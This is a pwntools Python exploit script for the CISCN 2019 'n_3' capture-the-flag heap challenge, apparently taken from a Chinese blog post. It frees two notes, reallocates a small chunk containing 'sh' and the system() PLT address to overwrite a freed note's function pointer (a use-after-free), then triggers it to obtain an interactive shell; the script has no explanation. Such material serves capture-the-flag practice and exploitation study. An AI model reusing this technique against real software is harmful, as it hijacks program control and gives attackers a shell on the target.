from pwn import *
p = process("./ciscn_2019_n_3")
elf = ELF('./ciscn_2019_n_3')
def do_new_text(idx, lens, content):
p.sendlineafter("CNote > ", '1')
p.sendlineafter("Index > ", str(idx))
p.sendlineafter("Type > ", '2')
p.sendlineafter("Length > ", str(lens))
p.sendlineafter("Value > ", content)
def do_new_int(idx, content):
p.sendlineafter("CNote > ", '1')
p.sendlineafter("Index > ", str(idx))
p.sendlineafter("Type > ", '1')
p.sendlineafter("Value > ", str(content))
def do_dump(idx):
p.sendlineafter("CNote > ", '3')
p.sendlineafter("Index > ", str(idx))
def do_dele(idx):
p.sendlineafter("CNote > ", '2')
p.sendlineafter("Index > ", str(idx))
do_new_text(0, 0x18, 'aaaa')
do_new_text(1, 0x18, 'bbbb')
do_dele(0)
do_dele(1)
do_new_text(2,0xc,'sh\x00\x00'+p32(elf.plt['system']))
do_dele(0)
p.interactive()
ciscn2019 pwn3
最新推荐文章于 2024-12-01 21:11:45 发布